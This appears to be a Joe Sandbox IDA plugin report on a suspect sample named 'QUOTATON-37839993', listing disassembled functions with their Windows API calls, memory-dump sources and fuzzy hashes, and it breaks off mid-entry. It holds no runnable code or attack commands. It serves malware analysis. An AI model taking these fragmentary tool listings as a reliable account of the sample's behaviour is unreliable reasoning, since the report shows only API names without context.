                                                                      Function 00E8B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E8B192
                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00E8B1B7
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E8B1CF
                                                                      • GetSystemMetrics.USER32(00000004), ref: 00E8B1F8
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E70E90,00000000), ref: 00E8B216
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$MetricsSystem
                                                                      • String ID:
                                                                      • API String ID: 2294984445-0
                                                                      • Opcode ID: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
                                                                      • Instruction ID: 1b1311efc6baca723db54ccc7e02abe3ea2fc0a4159d6aefa0265d345888d51d
                                                                      • Opcode Fuzzy Hash: 6515aa4b52c82ce9b4a01e04d90f663e34346dd2155a27e6b801b6942adec6d0
                                                                      • Instruction Fuzzy Hash: DA219172911251AFCB14AF39DC18A6A3BA4FB05325F145738F93EF71E0E73098559B90
                                                                      Function 00E59307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E59320
                                                                        • Part of subcall function 00E07BCC: _memmove.LIBCMT ref: 00E07C06
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59352
                                                                      • __itow.LIBCMT ref: 00E5936A
                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00E59392
                                                                      • __itow.LIBCMT ref: 00E593A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow$_memmove
                                                                      • String ID:
                                                                      • API String ID: 2983881199-0
                                                                      • Opcode ID: b97a8a34cf131faba86f580534c88053055bf15c0c9d36dc3e76cfa56dec120c
                                                                      • Instruction ID: c76793d35303d9f51c10825ef00b3e81142956d5104a8f61b96a1792d2d9f564
                                                                      • Opcode Fuzzy Hash: b97a8a34cf131faba86f580534c88053055bf15c0c9d36dc3e76cfa56dec120c
                                                                      • Instruction Fuzzy Hash: 19210731B00308FBDB10AB618C89EEE7BA9EF88715F046425FD48F71C2D6B09D499791
                                                                      Function 00E75A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindow.USER32(00000000), ref: 00E75A6E
                                                                      • GetForegroundWindow.USER32 ref: 00E75A85
                                                                      • GetDC.USER32(00000000), ref: 00E75AC1
                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00E75ACD
                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00E75B08
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ForegroundPixelRelease
                                                                      • String ID:
                                                                      • API String ID: 4156661090-0
                                                                      • Opcode ID: 5f80e24089c55087cc9007e486f56fdccd2c18c5cb96cd7ac05423cf5e2237a3
                                                                      • Instruction ID: 1a2d2e6fd01dde35e7ace102b8ee89e0f8ec1929004db5fa1853d52b1e22f541
                                                                      • Opcode Fuzzy Hash: 5f80e24089c55087cc9007e486f56fdccd2c18c5cb96cd7ac05423cf5e2237a3
                                                                      • Instruction Fuzzy Hash: 6121C336A00204AFDB04EF65DD88A9ABBE5EF58350F14C179F849E7362DA70BC44DB90
                                                                      Function 00E012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E0134D
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E0135C
                                                                      • BeginPath.GDI32(?), ref: 00E01373
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E0139C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: f76a97daac63b70872238a6eab85781c7a84cb97a4663b999beb275bf2673856
                                                                      • Instruction ID: 0cd92a6a7cacda647067a94a0b95ce7790d3245a0252115695e59e1b8314df22
                                                                      • Opcode Fuzzy Hash: f76a97daac63b70872238a6eab85781c7a84cb97a4663b999beb275bf2673856
                                                                      • Instruction Fuzzy Hash: 30214F32800604DFDB159F16EC09B6D7BA8EB00355F55427AF414BA1F0D776A8DADB50
                                                                      Function 00E64A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00E64ABA
                                                                      • __beginthreadex.LIBCMT ref: 00E64AD8
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00E64AED
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E64B03
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E64B0A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                      • String ID:
                                                                      • API String ID: 3824534824-0
                                                                      • Opcode ID: 6501f84c2c54c0a11c923ea288172e18ca3230ba80a8c732c3745392958c58cd
                                                                      • Instruction ID: 99a33329deacf55581dc9bba6b4d614f5690ba6fbb3933bd3611b4d7b6b6018e
                                                                      • Opcode Fuzzy Hash: 6501f84c2c54c0a11c923ea288172e18ca3230ba80a8c732c3745392958c58cd
                                                                      • Instruction Fuzzy Hash: DC1108B6905218BFC7009FA9EC08E9B7FECEB45360F144265F815F32A1D675D94887A0
                                                                      Function 00E58202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E5821E
                                                                      • GetLastError.KERNEL32(?,00E57CE2,?,?,?), ref: 00E58228
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00E57CE2,?,?,?), ref: 00E58237
                                                                      • HeapAlloc.KERNEL32(00000000,?,00E57CE2,?,?,?), ref: 00E5823E
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58255
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
                                                                      • Instruction ID: e04d4e01b0c665b705eade41a0249e62c6573db14e2488e3e369285ae92af8f9
                                                                      • Opcode Fuzzy Hash: 28bfbf8c5ee9f959bbd5d3c950983d20b2d33eca0b5ffbb6449c0720146deeb7
                                                                      • Instruction Fuzzy Hash: 27016D75601204BFDB204FA6DD48D6B7FACFF8A755B500929FC09E2220DA318C18DB60
                                                                      Function 00E5710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?,?,00E57455), ref: 00E57127
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57142
                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E57150
                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?), ref: 00E57160
                                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E57044,80070057,?,?), ref: 00E5716C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 3897988419-0
                                                                      • Opcode ID: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
                                                                      • Instruction ID: 1963d9afad58e75a3f6887c74006910d3ddfbb3526fffe96ba7ed432212887f2
                                                                      • Opcode Fuzzy Hash: c4d5a342b48e72f4e3e39c344adfcaf188ea0bf0a13e99c5bf228ce628d45aa3
                                                                      • Instruction Fuzzy Hash: CD01DF72602604BFCB144F66ED44BAA7BADEF44792F100464FD88E2220DB31DD188BA0
                                                                      Function 00E65244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65260
                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E6526E
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E65276
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00E65280
                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E652BC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                      • String ID:
                                                                      • API String ID: 2833360925-0
                                                                      • Opcode ID: c5e8f389dfe2fe17bbb9d27191ce418e22e6c8dc741c92207ee5c215b57e02f8
                                                                      • Instruction ID: ac7958866f4732b012b09d17e670cf787a8d769f6651a1278a607239e9c8548c
                                                                      • Opcode Fuzzy Hash: c5e8f389dfe2fe17bbb9d27191ce418e22e6c8dc741c92207ee5c215b57e02f8
                                                                      • Instruction Fuzzy Hash: AD015732E42A29DBCF00EFE5EC989EDBB78FB09711F401456E945F2161CB3055548BA1
                                                                      Function 00E5810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58121
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E5812B
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5813A
                                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58141
                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58157
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 44706859-0
                                                                      • Opcode ID: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
                                                                      • Instruction ID: f5079eefb673988cf39e962a5d6179df1ced81358eaa1cc77120b049553686d3
                                                                      • Opcode Fuzzy Hash: d18807c80b875cabef408977b73f16265055043b32e5cfbb7fc3995551877c17
                                                                      • Instruction Fuzzy Hash: FEF0C270202304AFEB110FA6ED8CE673BACFF49759B100425F949F2151DB60DC09EB60
                                                                      Function 00E5C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E5C1F7
                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E5C20E
                                                                      • MessageBeep.USER32(00000000), ref: 00E5C226
                                                                      • KillTimer.USER32(?,0000040A), ref: 00E5C242
                                                                      • EndDialog.USER32(?,00000001), ref: 00E5C25C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 3741023627-0
                                                                      • Opcode ID: dddd8d0a36e5f578a12a5564215d376c07ffc0fbcbf9176d3ced824489f32b3d
                                                                      • Instruction ID: b6893e3ccfa1acaf44fb5f25a069c441cda6f93f69e777bb9d50dbaa1e811f16
                                                                      • Opcode Fuzzy Hash: dddd8d0a36e5f578a12a5564215d376c07ffc0fbcbf9176d3ced824489f32b3d
                                                                      • Instruction Fuzzy Hash: D901A234404704AFEB205B61ED5EB9677B8BB00B06F100669E986B14F0DBE4A98C9B90
                                                                      Function 00E013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EndPath.GDI32(?), ref: 00E013BF
                                                                      • StrokeAndFillPath.GDI32(?,?,00E3B888,00000000,?), ref: 00E013DB
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E013EE
                                                                      • DeleteObject.GDI32 ref: 00E01401
                                                                      • StrokePath.GDI32(?), ref: 00E0141C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                      • String ID:
                                                                      • API String ID: 2625713937-0
                                                                      • Opcode ID: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
                                                                      • Instruction ID: b8b0feaad721f917429dfd6e92a44a73260bcc9218df46d21fbce9587d7e1b84
                                                                      • Opcode Fuzzy Hash: e0af359788ba7016d89806fb691569d9d8b411627e6e3446b13e750e624a2fbb
                                                                      • Instruction Fuzzy Hash: 88F0C932004A08EFDB195F27ED4CB583BA5A71132AF189275E429A90F1CB3659DADF50
                                                                      Function 00E6C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00E6C432
                                                                      • CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6C44A
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      • CoUninitialize.OLE32 ref: 00E6C6B7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                      • String ID: .lnk
                                                                      • API String ID: 2683427295-24824748
                                                                      • Opcode ID: 6cae7e78811dfb650ac293248375e402b32bb16c4fd27b2d995de1ad8150b863
                                                                      • Instruction ID: b04f8d99de322dfcf29fe4c3e6c1f792aba2b27c570abe37630a7b926ea7d8b7
                                                                      • Opcode Fuzzy Hash: 6cae7e78811dfb650ac293248375e402b32bb16c4fd27b2d995de1ad8150b863
                                                                      • Instruction Fuzzy Hash: 84A14BB1104205AFD704EF54C881EAFB7E8FF85344F00592DF595A72A2EB71EA49CB62
                                                                      Function 00E12CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
                                                                        • Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                        • Part of subcall function 00E07A51: _memmove.LIBCMT ref: 00E07AAB
                                                                      • __swprintf.LIBCMT ref: 00E12ECD
                                                                      Strings
                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E12D66
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                      • API String ID: 1943609520-557222456
                                                                      • Opcode ID: 876cf5b097626cbf70078bfb5508bc36112c952abc28f773d6ca6de538487ea3
                                                                      • Instruction ID: 0aee539532ab63246e85241a70a8800d127a37797b9932f954d9ece9f8f14441
                                                                      • Opcode Fuzzy Hash: 876cf5b097626cbf70078bfb5508bc36112c952abc28f773d6ca6de538487ea3
                                                                      • Instruction Fuzzy Hash: 1D916D715082159FCB14EF24D885CAFB7E8EF85714F00691DF596BB2A2EA30ED84CB52
                                                                      Function 00E6B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E04750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E04743,?,?,00E037AE,?), ref: 00E04770
                                                                      • CoInitialize.OLE32(00000000), ref: 00E6B9BB
                                                                      • CoCreateInstance.OLE32(00E92D6C,00000000,00000001,00E92BDC,?), ref: 00E6B9D4
                                                                      • CoUninitialize.OLE32 ref: 00E6B9F1
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                      • String ID: .lnk
                                                                      • API String ID: 2126378814-24824748
                                                                      • Opcode ID: 82abaecf0167d088ba125a92e5542744694e2e40432b884899635e6432752c3a
                                                                      • Instruction ID: 4249a42017392ebc9a52df9df312026d8a99ea1064cce771524107457bb10250
                                                                      • Opcode Fuzzy Hash: 82abaecf0167d088ba125a92e5542744694e2e40432b884899635e6432752c3a
                                                                      • Instruction Fuzzy Hash: 8AA16A756043059FCB04DF14C884D6ABBE5FF89324F149998F899AB3A2CB31ED85CB91
                                                                      Function 00E5B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
